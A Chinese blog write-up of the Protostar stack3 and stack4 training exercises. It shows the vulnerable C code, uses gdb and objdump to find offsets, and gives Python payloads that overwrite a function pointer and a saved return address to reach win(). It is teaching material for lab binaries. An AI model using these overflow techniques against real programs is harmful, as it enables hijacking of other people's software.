Protosar-Redirect Program Execution-stack3/stack4-bin-0x05

最新推荐文章于 2021-01-06 23:44:34 发布
最新推荐文章于 2021-01-06 23:44:34 发布
阅读量132 收藏
点赞数
分类专栏: LiveOverflow-binary hacking
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_25899635/article/details/93952604
版权

stack3.c

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>

void win(){
	printf("code flow successfully changed\n");
}

int main(int argc, char *argv[]){
	volatile int (*fp)();
	char buffer[64];
	fp = 0;
	gets(buffer);
	if (fp) {
		printf("calling function pointer, jumping to 0x%08x\n", fp);
		fp();
	}
}

与stack0及其的相似,唯一的不同是’modified‘变量变为了’*fp’函数指针。
使用objdump或gdb获取win函数的额位置:objdump -d stack3
在这里插入图片描述
我们可以看到“win()”函数位于内存中的0x08048424。所以如果我们能让程序跳到那里,它就会执行代码。如果代码中的“fp”指针不等于0,则会被调用。我们只需要通过执行某些操作,用“win()”的内存值覆盖它:
python -c ‘print “A”*64+"\x24\x84\x04\x08"’ | ./stack3
在这里插入图片描述
###########################################################################
stack4.c

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

void win(){
	printf("code flow successfully changed\n");
}

int main(int argc, char *argv[]){
	char buffer[64];
	gets(buffer);
}

非常非常简单的一段代码
同样,首先找到’win‘的位置

$ objdump -t stack4 | grep win
080483f4 g     F .text	00000014              win

我们需要改变ret返回时的EIP的值,要找到这个位置
首先利用工具创建生成一个唯一的字符串,这里使用python

padding = "AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSTTTTUUUUVVVVXXXYYYY"
print padding

python /tmp/stack.py > /tmp/exp
然后将它扔到gdb中,

(gdb) r < /tmp/exp
Starting program: /opt/protostar/bin/stack4 < /tmp/exp

Program received signal SIGSEGV, Segmentation fault.
0x54545454 in ?? ()

>>> chr(0x54)
'T'
>>>

定位到segmentationfault的位置,仔细观察registers:

(gdb) info registers 
eax            0xbffffc20	-1073742816
ecx            0xbffffc20	-1073742816
edx            0xb7fd9334	-1208118476
ebx            0xb7fd7ff4	-1208123404
esp            0xbffffc70	0xbffffc70
ebp            0x53535353	0x53535353
esi            0x0	0
edi            0x0	0
eip            0x54545454	0x54545454
eflags         0x210246	[ PF ZF IF RF ID ]
cs             0x73	115
ss             0x7b	123
ds             0x7b	123
es             0x7b	123
fs             0x0	0
gs             0x33	51

发现base pointer,ebp是十六进制的’53’,说明这个位置也被覆盖了。
重新修改exp:
  删除’S’之后的内容
  创建ebp和eip

import struct
padding = "AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRR"
ebp = "AAAA"
eip = struct.pack("I", 0x080483f4)
print padding+ebp+eip

$ python stack.py | /opt/protostar/bin/stack4
code flow successfully changed
Segmentation fault

Mandorr
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
高通开发系列 - linux kernel内核升级msm-3.18升至msm-4.9(1)
fulinux的博客
02-10 1545
高通开发系列 - linux kernel更新msm-3.18升至msm-4.9
Prison-Architect-Execution:基本监狱建筑师Lua执行
04-03
信息 如何使用: 编译DLL,然后使用DLL注入器将其注入Prison Architect。 确保在x32中编译它。 确保运行Prison Architect.exe不要运行Prison Architect64.exe 维基: 监狱建筑师Lua Wiki: 监狱建筑师Lua Wiki...
Buffer Overflows can Redirect Program Execution - bin 0x0D
weixin_42732173的博客
01-06 147
stack3 Stack3 looks at environment variables, and how they can be set, and overwriting function pointers stored on the stack (as a prelude to overwriting the saved EIP) Hints: both gdb and objdump is your friend whenyou determinewhere the win() functio..
路由器逆向分析------QEMU的基本使用方法(MIPS)
Fly20141201. 的专栏
04-06 9983
一、QEMU的运行模式 直接摘抄自己《揭秘家用路由器0day漏洞挖掘技术》,网上查了一下也没有找到令人满意的QEMU的使用说明,就采用这本书上的介绍。如果后期能够找到比较满意的QEMU的使用方法的说明,再添加上来。 QEMU模拟器主要有两种比较常见的运作模式:User Mode(使用者模式)、System Mode(系统模式)。User Mode模式下,用户只需要将各种不同平台的处
qemu-3.0.0
dhr15931的博客
11-23 598
QUMU 官方介绍 ARM System emulator 1 3.5 ARM System emulator 2 3 Use the executable qemu-system-arm to simulate a ARM machine. The ARM Integrator/CP board is emulated with the following de...
软件项目管理-Execution-V200.ppt
11-21
软件项目管理-Execution-V200.ppt
Shreds__Fine-grained_Execution_Units_With_Private_Memory.pdf
08-07
Shreds__Fine-grained_Execution_Units_With_Private_Memory.pdf
react-native-background-execution-ios:React iOS的本机后台执行管理
05-10
yarn add react-native-background-execution-ios 自动连结 react-native link react-native-background-execution-ios 手动链接 在XCode的项目导航器中,右键单击“ Libraries ➜ Add Files to [your project's ...
symbolic-execution-tutorial:符号执行教程。 动手练习基于angr框架
02-06
修订版2019-12-05: 修订2018-11-29: 动手 建立 请参阅 。 幻灯片范例 您可以在slide-example目录中找到源代码,二进制文件(Linux x86_64)和angr脚本。 必须自定义solve-example.py ,替换{XXX,YYY,ZZZ}占位...
Elasticsearch初识与简单案例.pdf
04-29
Elasticsearch是一个基于Lucene的分布式全文搜索引擎,提供灵活且高效的搜索和分析功能。通过HTTP请求和客户端库,用户可以索引和搜索文档,执行复杂查询,进行数据分析,并享受高亮显示等特性。其高级功能如复合查询、聚合分析、滚动搜索等,使其适用于各种数据处理和分析场景。Elasticsearch还具有强大的监控和日志功能,确保集群稳定运行。总之,Elasticsearch是企业级搜索和分析的理想选择。
Python基于LSTM模型对全国的空气质量数据进行可视化分析预测源代码
04-29
介绍 对全国2019年1月至2023年12月的空气质量数据进行分析,绘制时间序列图,展示每月/每季度的平均AQI变化趋势。绘制不同省份和城市的平均AQI热力图。分析不同污染物的浓度分布和趋势。绘制空气质量等级分布图。 需求说明 对空气质量数据进行数据分析,并使用LSTM模型进行预测。 安装教程 pip install jupyter pip install numpy pandas matplotlib seaborn 使用说明 在项目路径下打开终端输入jupyter notebook就行
百问网linux桌面GUI,基于LVGL 8.x。.zip
04-29
百问网linux桌面GUI,基于LVGL 8.x。
基于Vue开发的XMall商城前台页面 PC端.zip
04-29
基于Vue开发的XMall商城前台页面 PC端.zip
2019年中国民航大学电子设计竞赛E题-自动导航运输车
04-29
2019年中国民航大学电子设计竞赛E题-自动导航运输车 全国大学生电子设计竞赛(National Undergraduate Electronics Design Contest),试题,解决方案及源码。计划或参加电赛的同学可以用来学习提升和参考
精灵宝可梦go游戏UI界面设计PSD源文件.zip
04-29
游戏开发资源,游戏UI,游戏GUI,游戏图标,PSD格式,XD格式,PNG下载,源文件,可编辑下载,游戏购物充值界面,宝石,图标,PS格式,AI格式等,游戏APP
线索二叉树的实现.doc
04-29
(1)逻辑设计:写出抽象数据类型的定义,各个主要模块的算法,并画出模块之间的调用关系图; (2)详细设计:定义相应的存储结构并写出各函数的伪码算法。 (3)程序编码:把详细设计的结果进二步求精为程序设计语言程序。 (4)程序调试与测试:采用自底向上,分模块进行,即先调试低层函数。 (5)结果分析:程序运行结果包括正确的输入及其输出结果和含有错误的输入及其输出结果。算法的时间、空间复杂性分析; 效果表现为用户输入一串字符表示的先序序列,程序能够根据这个序列正确地建立二叉树,并通过中序线索化非递归遍历结果。这有助于验证二叉树结构和遍历算法的正确性,同时对于理解和操作二叉树数据结构非常有帮助。 程序的输出结果证明了其对二叉树操作的正确性和有效性。
资源【STM32+HAL】SDIO模式读写SD卡
04-29
​ 一、准备工作 有关CUBEMX的初始化配置,参见我的另一篇blog:【STM32+HAL】CUBEMX初始化配置 二、所用工具 1、芯片: STM32F407VET6 2、IDE: MDK-Keil软件 3、库文件:STM32F4xxHAL库 三、实现功能 实现用DMA读写SD卡内容 ​
node-v10.4.0-win-x86.zip
最新发布
04-29
Node.js,简称Node,是一个开源且跨平台的JavaScript运行时环境,它允许在浏览器外运行JavaScript代码。Node.js于2009年由Ryan Dahl创立,旨在创建高性能的Web服务器和网络应用程序。它基于Google Chrome的V8 JavaScript引擎,可以在Windows、Linux、Unix、Mac OS X等操作系统上运行。 Node.js的特点之一是事件驱动和非阻塞I/O模型,这使得它非常适合处理大量并发连接,从而在构建实时应用程序如在线游戏、聊天应用以及实时通讯服务时表现卓越。此外,Node.js使用了模块化的架构,通过npm(Node package manager,Node包管理器),社区成员可以共享和复用代码,极大地促进了Node.js生态系统的发展和扩张。 Node.js不仅用于服务器端开发。随着技术的发展,它也被用于构建工具链、开发桌面应用程序、物联网设备等。Node.js能够处理文件系统、操作数据库、处理网络请求等,因此,开发者可以用JavaScript编写全栈应用程序,这一点大大提高了开发效率和便捷性。 在实践中,许多大型企业和组织已经采用Node.js作为其Web应用程序的开发平台,如Netflix、PayPal和Walmart等。它们利用Node.js提高了应用性能,简化了开发流程,并且能更快地响应市场需求。
Missing Hive Execution Jar: /opt/module/apache-hive-1.2.1-bin/lib/hive-exec-*.jar
09-23
4. 如果你正在使用远程Hive服务器,请确保你的客户端能够访问Hive服务器,并且Hive服务器上的配置正确。 如果以上步骤都没有解决问题,你可能需要查看Hive的日志文件,以确定更具体的错误信息。 ### 回答2: 在...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值